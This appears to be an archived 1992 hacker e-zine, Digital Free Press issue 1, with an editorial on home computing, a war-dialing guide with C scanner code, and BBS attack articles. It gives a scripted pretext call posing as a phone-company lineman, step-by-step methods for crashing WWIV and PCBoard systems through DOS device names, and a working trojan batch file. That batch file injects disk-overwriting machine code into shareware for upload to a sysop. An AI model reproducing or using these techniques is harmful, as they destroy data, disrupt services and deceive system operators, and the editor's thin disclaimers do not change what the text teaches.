home *** CD-ROM | disk | FTP | other *** search
/ The Hacker Chronicles - A…the Computer Underground / The Hacker Chronicles - A Tour of the Computer Underground (P-80 Systems).iso / miscpub2 / dfp.001 < prev    next >
Text File  |  1992-09-26  |  24KB  |  605 lines

  1.  
  2.               #########             ############       ######### 
  3.               ###########           ############       ###########
  4.               ####    ####          ####               ####    ####
  5.               ####    ####          ####               ####    ####
  6.               ####    ####          ########           ###########  
  7.               ####    ####          ########           #########
  8.               ####    ####          ####               ####
  9.               ####    ####          ####               ####
  10.               ###########           ####               ####
  11.               #########             ####               #### 
  12.  
  13.                             DIGITAL FREE PRESS
  14. -------------------------------------------------------------------------------
  15.                     V 1.0        Issue 1.0        January 1992
  16. -------------------------------------------------------------------------------
  17.  
  18.        * A Publication of The Underground Computing Foundation (UCF) *
  19.  
  20.             * Send Submissions to: underg!hackers@uunet.uu.net *
  21.  
  22.               * Editor: Max Cray (underg!max@uunet.uu.net) *
  23.  
  24.               * BBS: The Underground (401) 847-2603 (v.32) *
  25.  
  26. ------------------------------------------------------------------------------
  27.  
  28. In this Issue:
  29.  
  30.     1. _The Future Computer_ Editorial by Max Cray
  31.     2. Phone Number Scanning by GodNet Raider
  32.     3. Fun with the CLOCK$ device driver by The Riddler
  33.     4. Homegrown Trojan by The BBC
  34.  
  35. ------------------------------------------------------------------------------
  36.  
  37.                            The Future Computer
  38.  
  39.                               by Max Cray
  40.  
  41.     In the future, your computer will be a standard household appliance,
  42. like your water heater. It will probably be sitting in a back closet someplace
  43. rarely seen. It will come with your house. Your house will also have a built
  44. in local area network, and there will be terminals in almost every room.
  45.     The distinction between television, radio, and computer networks will
  46. disappear, as the computer becomes the audio, and visual controller. Your
  47. television will be a peripheral to your computer. It will receive from a cable
  48. and feed into your computer, where you will be able to watch TV from any of the
  49. terminals in the house. The terminals will consist of a monitor, probably with
  50. a slot for a floppy disk, and a keyboard. Your stereo will also be a
  51. peripheral to your computer but specialized music media will disappear as
  52. music, movies, and new forms of entertainment will be distributed digitally on
  53. normal computer disks, or through the network.  Your video camera will also
  54. become a computer PERIPHERAL, and the variety of programming will increase
  55. exponentially, as private individuals will be able to create their own
  56. programming to post on the audiovisual network, for all to experience. There
  57. will be national audiovisual networks, and small private networks, similar to
  58. computer bulletin boards of today, but they will be more like personal TV
  59. stations. Those that watch will also contribute to programming, both real time,
  60. and stored. You will be able to have your computer capture any real time event
  61. you missed for storage, for you to later experiencing, editing, etc. You will
  62. be able to send audio, and audiovisual mail, but normal electronic mail will
  63. stay as many will not want to be seen or heard, especially early in the
  64. morning.
  65.     There will be some political decisions to make, as those who control the
  66. national computer networks will become very powerful, and freedom of expression
  67. issues will continue to crop up, as there will be some who call for regulation.
  68. However the power of the national networks will be leveraged by many smaller
  69. networks, which will in fact have gateways to each other.
  70.     There will be centers for the treatment of those addicted to computers.
  71. Your spouse will think it none too soon.
  72.     All the technology I have discussed already exists. The prime factor that
  73. is preventing the changes to society is the cost of the technology. As we all
  74. know, the cost of technology is always dropping. The speed that society
  75. changes is directly related to the speed that the cost of technology drops.
  76.  
  77. -------------------------------------------------------------------------------
  78.  
  79. To: hackers@underg
  80. Subject: Scanning.
  81. From: gnr@tsf.UUCP (GodNet Raider)
  82. Organization: The CyberUnderground
  83.  
  84.  
  85.                    -=[ Intelligent Phone Number Scanning ]=-
  86.  
  87.                                      -or-
  88.  
  89.                 /**********************************************/
  90.                 /* How to find the number you are looking for */
  91.                 /*  without the help of a friendly operator.  */
  92.                 /**********************************************/
  93.                 
  94.                                 - written by -
  95.                                  GodNet Raider
  96.                                     - of -
  97.                              The CyberUnderground
  98.  
  99.  -=[ "Information is the greatest weapon of power to the modern wizard." ]=-
  100.  
  101. ]----------------------------------------------------------------------------[
  102.  
  103. Introduction:
  104. -------------
  105.  
  106.     This phile is written to help in the eternal search for a place to jack
  107. in. It contains tips that will help to make the most use of phone number
  108. scanners and to better target a particular system.
  109.  
  110.  
  111. Scanning Tools Needed:
  112. ----------------------
  113.  
  114.     The only tools needed is a computer, phone number scanner software, and a
  115. computer modem. The scanner program is one that dials numbers though your
  116. modem under a given prefix and reports if a carrier (the signal that your 
  117. modem is connected to another modem) was found or not. There are a lot of 
  118. programs out there that will do this function nicely but for you obsessed
  119. prodigies out there the source code for a simple scanner is provided at
  120. the end of this phile.
  121.  
  122. Scanning Tips:
  123. --------------
  124.  
  125.     1)  When looking for a particular system (company, school, etc..) keep in
  126.         mind the "+/- ten rule". This rule simply states that most jacks will
  127.         be found within ten (+/-) sequential instances from the normal 
  128.         business phone number. In larger corporations this could be as much
  129.         as twenty (+/-). So to find a site with a business number at 555-1212
  130.         the scanner should start at 555-1202 and try the next twenty
  131.         instances (555-1202 to 555-1222) or ten below and above the base
  132.         number. It should also be noted that in places that had the system
  133.         installed long after it was established this system may not work. But
  134.         due to the great size and expense of some systems they are installed
  135.         day one, so the numbers are assigned to that site (voice, Data, fax,
  136.         etc..) sequentially.
  137.  
  138.     2)  Also in areas with more than one prefix (746, 747, 748) older sites
  139.         will be found on the lower prefixes (746/747), while newer
  140.         installations will be found on the higher ones (747/748).
  141.  
  142.     3)  Scanning should be done in small bursts to avoid alerting the PhoCo
  143.         to what you are up to. This means having the scanner only call about
  144.         3 numbers in a burst then wait 5 - 10 minutes for the next burst. It
  145.         is also a good idea to do no more than 50 tries every other day.
  146.  
  147.     4)  Don't go jacking right after finding a system. It is good practice to
  148.         wait a few days to allow any possible suspicion to wane.   
  149.         It is easer to explain a seemingly one time jacking as "... Sorry,
  150.         must have misdialed a local bbs number. But I did hang up right away
  151.         as not to break any <sic> laws..." Than it is to explain why you
  152.         misdialed the number 50 times in less than 30 minutes.
  153.  
  154.     5)  Social Engineering is always an last resort. Calling the sites 
  155.         business number between 12:30 and 1:30 will allow for the regular
  156.         sysadmin to leave for lunch leaving an intern or other busy/hurried
  157.         employee (who does not have the time to talk) to answer your inquiry.
  158.         Tell the person on the other end something like the following. 
  159.         
  160.             "Hello, This is linemen Xxxxxxx. I am out here at the junction 
  161.             box and am tracing the line noise problem you reported. The
  162.             number on my service request does not show data equipment on that
  163.             line (give the number you are calling at this time)..."
  164.         
  165.         If all goes well you should get a response like the following...
  166.         
  167.             "Oh it seems you people at the PhoCo have screwed up (everyone
  168.             likes to take an elitist attitude toward the PhoCo. An love to
  169.             point out errors and correct them). You have the business number
  170.             listed as the system number(s). The system number(s) is/are..."
  171.  
  172.  
  173. Scanner Source Code:
  174. --------------------
  175.  
  176.     The following source was written for the IBM pc/clones. As much ansi 'c'
  177. was used as possible, but system specific information (like port i/o) has been
  178. set off into specific functions so that it can be converted to other systems
  179. without having to reinvent the wheel. This program takes information from
  180. the command line and writes output to standard i/o. 
  181.  
  182.  +---- Cut Here ----+---- Cut Here ----+---- Cut Here ----+---- Cut Here ---+
  183.  
  184. /*
  185.     scanner.c
  186.     by GodNet Raider
  187.     
  188.         It is assumed that the serial port and modem have already been setup.
  189.         Com 1 & 2 only supported.
  190. */
  191.  
  192. #include <ctype.h>
  193. #include <stdio.h>
  194. #include <stdlib.h>
  195. #include <string.h>
  196. #include <time.h>
  197.  
  198. #define FALSE 0
  199. #define TRUE 1
  200. #define DTR_ON(x) outp(anBCom[x]+4,0x03)
  201. #define DTR_OFF(x) outp(anBCom[x]+4,0x00)
  202. #define CTS(x) inp(anBCom[nPort]+5)&0x0020
  203. #define DATA_READY(x) inp(anBCom[x]+5)&0x0001
  204.  
  205. char
  206.     *aszError [] =
  207.         {
  208.          "\nUsage: SCANNER <Port #> <PreFix> <Start #> <Count>\n"
  209.          "\tPort #  - Serial port number to use.\n"
  210.          "\tPreFix  - Static part of phone number(ie. 1-800-555-, 846-, etc..).
  211. \n"
  212.          "\tStart # - last 4 digits of phone number (ie. 1212, 0065, etc..).\n"
  213.  
  214.          "\tCount   - Number of instances (single stepped) to scan.\n",
  215.          "\nNumbers are out of range.",
  216.          "\nModem error."
  217.         },
  218.     *aszTarget [] = 
  219.         {
  220.          "connect",
  221.          "busy"
  222.         };
  223.  
  224. unsigned int
  225.     anBCom [] = 
  226.         {
  227.          0x3f8,
  228.          0x2f8
  229.         };
  230.  
  231. unsigned int
  232.     Call (unsigned char, char*),
  233.     receive_chr (unsigned long, unsigned char),
  234.     send_chr (unsigned char, unsigned char);
  235.  
  236. void
  237.     FatalError (int),
  238.     main (int, char**),
  239.     Wait (unsigned long);
  240.  
  241. void main (argc, argv)
  242. int
  243.     argc;
  244. char
  245.     *argv [];
  246.  
  247. {
  248.     char
  249.         szWork [128];
  250.     unsigned char
  251.         nPort;
  252.     unsigned int
  253.         nPrsNum,
  254.         nEndNum;
  255.     
  256.     if (argc < 5)
  257.         FatalError (1);
  258.     nPort = (unsigned char) atoi (argv [1]) - 1;
  259.     nEndNum = (nPrsNum = atoi (argv [3])) + atoi (argv [4]);
  260.     if (nPrsNum > 9999 || nEndNum > 9999 || nEndNum <= nPrsNum || nPort > 1)
  261.         FatalError (2);
  262.     while (nPrsNum != nEndNum)
  263.         {
  264.          printf ("%s%04i : ", argv [2], nPrsNum);
  265.          sprintf (szWork, "ATX4Q0V1DT%s%04i\r", argv [2], nPrsNum++);
  266.          printf ("%sCarrier Found\n", (Call (nPort, szWork) ? "" : "No "));
  267.         }
  268.     exit (0);
  269. }
  270.  
  271. unsigned int Call (nPort, ptDialStr)
  272. unsigned char
  273.     nPort;
  274. char
  275.     *ptDialStr;
  276. {
  277.     unsigned long
  278.         nWait;
  279.     unsigned int
  280.         nTmpCnt,
  281.         nResChr,
  282.         nRetCode = FALSE;
  283.     char
  284.         fCont = TRUE,
  285.         szWork [256] = "",
  286.         *ptWork;
  287.  
  288.     DTR_ON (nPort);
  289.     Wait (5);
  290.     while (*ptDialStr)
  291.         if (send_chr (*ptDialStr, nPort))
  292.             ptDialStr++;
  293.         else
  294.             if (!(receive_chr (1l, nPort) & 0xff00))
  295.                 {
  296.                  outp (anBCom [nPort] + 4, 0x00);
  297.                  FatalError (3);
  298.                 }
  299.     ptWork = szWork;
  300.     nWait = time (NULL) + 30;
  301.     while (time (NULL) < nWait && fCont)
  302.         {
  303.          if ((nResChr = receive_chr (1l, nPort)) & 0xff00)
  304.             {
  305.              *(ptWork++) = (char) tolower (nResChr & 0x00ff);
  306.              *ptWork = 0x00;
  307.              for (nTmpCnt = 2; nTmpCnt && fCont; nTmpCnt--)
  308.                 if (strstr (szWork, aszTarget [nTmpCnt - 1]))
  309.                     {
  310.                      if (--nTmpCnt)
  311.                         printf ("[%s] ", aszTarget [nTmpCnt]);
  312.                      nRetCode = !nTmpCnt;
  313.                      fCont = FALSE;
  314.                     }
  315.             }
  316.         }
  317.     DTR_OFF (nPort);
  318.     Wait (5);
  319.     return nRetCode;
  320. }
  321.  
  322. unsigned int send_chr (cCh, nPort)
  323. unsigned char
  324.     cCh,
  325.     nPort;
  326.  
  327. {
  328.     if (CTS (nPort))
  329.         {
  330.          outp (anBCom [nPort], (int) cCh);
  331.          return TRUE;
  332.         }
  333.     return FALSE;
  334. }
  335.  
  336. unsigned int receive_chr (nWait, nPort)
  337. unsigned long
  338.     nWait;
  339. unsigned char
  340.     nPort;
  341. {
  342.     nWait += time (NULL);
  343.     while (time (NULL) < nWait)
  344.         if (DATA_READY (nPort))
  345.             return ((inp (anBCom [nPort]) & 0x00ff) + 0x0100);
  346.     return FALSE;
  347. }
  348.  
  349. void Wait (nWait)
  350. unsigned long
  351.     nWait;
  352. {
  353.     nWait += time (NULL);
  354.     while (time (NULL) < nWait);
  355. }
  356.  
  357. void FatalError (nErrorNum)
  358. int
  359.     nErrorNum;
  360. {
  361.     printf (aszError [nErrorNum - 1]);
  362.     exit (nErrorNum);
  363. }
  364.  
  365.  +---- Cut Here ----+---- Cut Here ----+---- Cut Here ----+---- Cut Here ---+
  366.  
  367. ]============================================================================[
  368.  
  369.  
  370. Date: 08-03-91 (01:37)              Number:    111 of 124
  371.   To: ALL                           Refer#:    NONE
  372. From: <CENSORED>                    Read:      (N/A)
  373. Subj: URGENT                        Status:    PUBLIC MESSAGE
  374. Conf: SYSOPS (5)                    Read Type: GENERAL (-)
  375.  
  376. *** ATTENTION MS-DOS BASED SYSTEM OPERATORS ***
  377.  
  378. This message is not a joke, scare, or farce. Read carefully and please
  379. take precautions to prevent potential damage to your system.
  380.  
  381. A RI sysop has found     [with the help of a local hacker - Ed]
  382. a quite serious problem which appears to be in DOS.
  383. The release of this information has to be done VERY carefully because of
  384. the potential damage which can be done to bbs systems. (maliciously)
  385.  
  386. IF YOU WANT TO PREVENT DAMAGE TO YOUR SYSTEM:
  387.  
  388. Disable uploads with the pattern of CLO*.* immediately. If you do not,
  389. you run the risk of not only crashing the board but losing your CMOS
  390. configuration as well. This has been tested with 3 different PCBoard
  391. systems, and they were affected immediately. This bug also affected the
  392. tested computers in a non bbs environment (ie in DOS).
  393.  
  394. If you would like further information, please arrange a private voice
  395. call or page during the day Saturday. Remember, we have to be very
  396. careful about this information getting out there until this is addressed
  397. and proper precautions have been taken by ALL sysops.
  398.  
  399. This problem is not a virus, trojan, or a particular file.... It is a
  400. file NAME which causes this corruption of cmos configurations in 80286+
  401. class machines, regardless of the file contents... The actual filename
  402. has been PURPOSELY omitted from this message.  Feel free to distribute
  403. this notification to any other PRIVATE sysop base in the area. Note:
  404. This should not be posted publicly, as it could be a potential security
  405. problem and there are likely others that have not been discovered as of
  406. yet. Please take any necessary precautions to protect your system.
  407.  
  408. [Editor's note: It's not that hard to run a MEM with the /d flag to find 
  409. the CLOCK$ device driver.]
  410.  
  411. --------------------------------------------------------------------------
  412.  
  413. Subject: Phrack 35
  414. From: riddler (The Riddler)
  415.  
  416. In Phrack 35 a letter from The Dark Lord Sarik Malthus asking for the
  417. justification of hacking: "...in your mind justify the actions of hackers..."
  418. He runs a small bulletin board (running WWIV v.4.20) with an oppressive
  419. fashion. He censors email and very strictly dictates behaviour on his BBS.
  420. He does this, not by any social standards but by his own, which I admit is
  421. admirable...but not when it suppresses FREEDOM OF INFORMATION. The experience
  422. he has had with hackers was primarily with me crashing his board by repeatedly
  423. finding bugs in the WWIV system. I tried every technique explained in
  424. Phrack 34 with no success. However, I am writing to explain a few ways of
  425. harmlessly and temporarily crashing any WWIV and most other BBS packages.
  426.  
  427. In the MS-DOG environment we are endowed with a few devices such as:
  428. COM1, COM2, AUX, PRN, CON, and CLOCK$, yes there is such a device.
  429.  
  430. Previous to Dark Lord's upgrade to version 4.20 of WWIV he was running version
  431. 4.12.
  432.  
  433. Here are two ways to crash that system:
  434.  
  435. Note: Use XMODEM OR ASCII PROTOCOLS, NOT ZMODEM OR YMODEM.
  436.  
  437. - #1 -
  438.  
  439. Goto to the file xfer section.
  440. Choose to upload a file.
  441. When prompted with the filename, type COM2 (most likely where his modem is).
  442. Finding this device as a file, WWIV asks if you would like to add that
  443. filename to the file database; say yes. 
  444. At that point the file "COM2" will appear as a file available for download.
  445. Download it.
  446. Woooops. A big problem occurs when MS-DOG attempts to read from and write
  447. to the same device name simultaneously. Oh well.
  448. What will most likely happen is either a hardware lock-up or a dos
  449. error message like "Write fault error reading COM2, Abort, Retry...."
  450. Both require that a sysop do something to get the system back up.
  451.  
  452. - #2 -
  453.  
  454. Again, goto the file xfer section.
  455. Choose to upload a file
  456. When prompted with the name say you want to upload clock$.zip (ext. does not
  457. matter). Upload any 'ol file on your harddrive, at least 6 bytes or so.
  458. That upload will be fed directly to his clock as a new time setting. The bytes
  459. being rather random, so will the new date/time. When you complete the xfer
  460. WWIV attempts to find out how long you have been xfering for and how much
  461. time you have left for that session and completely keels over.
  462. It will not recover until the sysop has rebooted and reset the clock
  463. or the CMOS-clock (if he has CMOS). 
  464. Clean cut and annoying.
  465.  
  466. - #3 - (not very thoroughly tested but should word)
  467.  
  468. Everything the same as in the previous to cracks up to the device name.
  469. This time upload CON.
  470. Upload your favorite ansi bombs and remap often used keys to = 
  471. nasty dos commands or whatever...on the
  472. remote system's keyboard. Hopefully the sysop will have loaded, the 
  473. regular ansi.sys that comes with DOS. This is being fed directly
  474. to his CON -- his keyboard/screen. Try to do this while the sysop
  475. is in bed.
  476.  
  477. ------------------------------------------------------------------------------
  478. But oh no! Version 4.20 of WWIV came out. What will we do now?
  479. It now prevents users from uploading files by the names of devices 
  480. altogether. 
  481. Try these techniques:
  482. ------------------------------------------------------------------------------
  483.  
  484. - #4
  485.  
  486. Create a zipfile containing a file of no less than 6 bytes (again) with a name
  487. of exactly 6 char's. Then, using your FAVORITE hex editor open your zipfile
  488. and change the two occurrences of your chosen filename of the file in the 
  489. zipfile to "ClOck$" (not case sensitive).
  490. After the upload is completed goto the archive menu (a submenu off of the xfer
  491. menu). Choose to extract a file within your zipfile temporarily. Extract the 
  492. clock$ within your freshly uploaded zipfile. WWIV, with the assistance of
  493. PKzip will extract the contained clock$'s contents and spew every byte right 
  494. into the clock$ device again. Clock/cmos screwed again. Locking crashing the
  495. board and locking the computer up. Woops.
  496.  
  497. #5
  498.  
  499. Or try this:
  500. Goto the archive menu in xfer section
  501. choose to (A)dd a file to a temporary archive
  502. then, guess what? choose clock$.
  503. WWIV, again with help from PKzip will (this time) read (not write) from
  504. the clock$. Since it will never reach the EOF it is looking for, as it 
  505. would in a regular file WWIV keels over again. In this process messing
  506. the clock up thoroughly. Locking the board and/or computer up.
  507.  
  508. --------------------------------------------------------------------------
  509. | Uploading clock$ works also, on all PCBoard's versions 14.5 and lower. |
  510. --------------------------------------------------------------------------
  511.  
  512. I have more BBS crashing techniques if you would like them.
  513. Other BBS's different techniques.
  514.  
  515. Happy Cracking and a Happy Crashed Year.
  516. From of The Underground Computing Foundation.
  517.  
  518. The Riddler
  519. underg!riddler@uunet.uu.net
  520.  
  521. [Editors Note: The UCF does not condone destructive actions. This material
  522.                is distributed to help sysops protect themselves from dangerous
  523.                users like The Riddler.]
  524.  
  525. ------------------------------------------------------------------------------
  526.  
  527. Subject: Fun...
  528. From: bbc (the bbc)
  529.  
  530.     So you say your bored... Want to do something but not sure what...
  531. Well how about crashing a smug WWIV sysop! 
  532.  
  533.     Why not not make a trojan [We mean the horse type] and send it
  534. to them. How you say... Well not that weeeeeee... would condone such
  535. an act..... But for information purposes only we will give you the
  536. method to our madness...
  537.  
  538.     Step 1:
  539.  
  540.         Make a batch file called "INJECT.BAT" and in it place
  541.         the following commands -
  542.         
  543.         ============================================================
  544.         echo off
  545.         cls
  546.         echo e cs:0100 b4 19 cd 21 b9 09 00 33 d2 cd 26 > ~~temp.~tp
  547.         echo w >> ~~temp.~tp
  548.         echo q >> ~~temp.~tp
  549.         debug %1 < ~~temp.~tp > nul
  550.         erase ~~temp.~tp > nul
  551.         ==============================================================
  552.     
  553.     Step 2:
  554.  
  555.         Then copy a *.COM file into the same directory. Should
  556.         be part of some shareware thing that the sysop would like. 
  557.         With docs an all... would not want them to get suspicious,
  558.         now would we.............
  559.  
  560.     Step 3:
  561.  
  562.          Run the following command from the dos prompt...
  563.  
  564.              INJECT <COM file to inject with trojan>
  565.  
  566.     Step 4:
  567.  
  568.         Re- zip, arc, lharc, zoo, ect... the thing with it's
  569.         other files... 
  570.  
  571.     Step 5:
  572.  
  573.        Upload the mess to the unsuspecting sysop and watch the fun! 
  574.  
  575.  
  576.     See and you thought hacking was hard...... Of course if they
  577. get smug and start searching for the injected code.... We'll just have
  578. to add extra code (nops' ect) and switching some of the code around...
  579.  
  580.     Next lesson How to bypass Disk protect programs and WWIV door
  581. security.... Don't miss it.... Same bat time! Same bat channel!
  582.  
  583. The BBC
  584.  
  585. -------------------------------------------------------------------------------
  586.  
  587. [Editors note: In case you missed that BBC hack here it is disassembled:
  588.  
  589. 0100 B419    MOV AH,19    'Get Default Drive
  590. 0102 CD21    INT 21       'Call DOS
  591. 0104 B90900  MOV CX,0009  'Write 9 Sectors
  592. 0107 33D2    XOR DX,DX    'Starting as sector 0
  593. 0109 CD26    INT 26       'Absolute Disk Write (Oouch!)
  594.  
  595. And thats all she wrote...
  596.  
  597. You can protect yourself from software that does this by using a utility
  598. like MIRROR or IMAGE.]
  599.  
  600. Keep those letters coming...
  601.  
  602.                                 The End
  603.  
  604. Downloaded From P-80 International Information Systems 304-744-2253
  605.